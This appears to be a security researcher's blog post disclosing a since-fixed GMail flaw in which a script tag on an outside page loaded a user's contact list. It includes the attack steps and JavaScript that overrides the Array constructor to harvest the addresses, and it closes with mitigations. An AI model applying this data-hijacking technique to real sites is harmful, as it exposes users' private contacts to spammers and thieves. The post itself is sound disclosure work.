A few months ago, I discovered a vulnerability in GMail where it became trivial to compromise someone's email contact list. I demonstrated the issue to a friend at Google by emailing his GMail account with simple link. Upon clicking the link and viewing the page, no XSS required, your contacts were displayed on screen (see screenshot). From there the email addresses could be easily stolen. Imagine if a spammer stumbled across this!

The issue was fixed within a few days, but the reason this particular vulnerability was interesting is the exploit techniques are a bit different than normally discussed. Also, I've been seeing the scenario described below increasingly often in websites. Those interested in browser security and AJAX development should take note.


Attack Details
Assumes some knowledge of Cross-Site Request Forgeries, but with a slight variation.

1) Email a GMail account a link and click.
example: http://foo/index.html


2) HTML of http://foo/index.html
The single line of HTML below forces the web browser to automatically send an off-domain HTTP request to GMail. If the victim is logged-in(obviously the case when you email a GMail account), the session cookies will be sent along with the request, and the response contains the contact list. The URL was predictable across all users.

Page URL: http://foo/index.html

<*script src="http://mail.google.com/mail/?_url_scrubbed_">

3) Sample content of http://mail.google.com/mail/?_url_scrubbed

The JavaScript line below contains an unreferenced array constant with your contact list of email addresses.

[["ct","Your Name","foo@gmail.com"], ["ct","Another Name","bar@gmail.com"] ]

GMail normally sends an XmlHttpRequest (XHR) to get this data on the fly where its then eval'ed in the browser and assigned to a variable. However in our case, the constant is loaded into JavaScript space on (http://foo/index.html) using a script tag, so its never assigned to a variable. This means accessing the data requires something more.


4) Accessing the contact list

When JavaScript parses and interprets the unreferenced array the Array constructor is called. Its possible to overwrite the internal Array constructor with our own to access the contact list. The new Array constructor uses a setters to trigger events, then parses out the data we want, and prints the data to screen.

var table = document.createElement('table');
table.id = 'content';
table.cellPadding = 3;
table.cellSpacing = 1;
table.border = 0;

function Array() {
var obj = this;
var ind = 0;
var getNext;
getNext = function(x) {
obj[ind++] setter = getNext;

if(x) {
var str = x.toString();
if ((str != 'ct') &&amp;amp;amp; (typeof x != 'object') && (str.match(/@/))) {
var row = table.insertRow(-1);
var td = row.insertCell(-1);
td.innerHTML = str;
}
}
};
this[ind++] setter = getNext;
}

function readGMail() {
document.body.appendChild(table);
}


Moral of the Story

* Don't put sensitive data in pure JavaScript files. Wrap HTML tags around the data to protect it from script tags.
* If JavaScript files must contain sensitive information, make the URL unpredictable. And/Or...
* Make sure the file cannot be accessed by anything with an off-domain referer.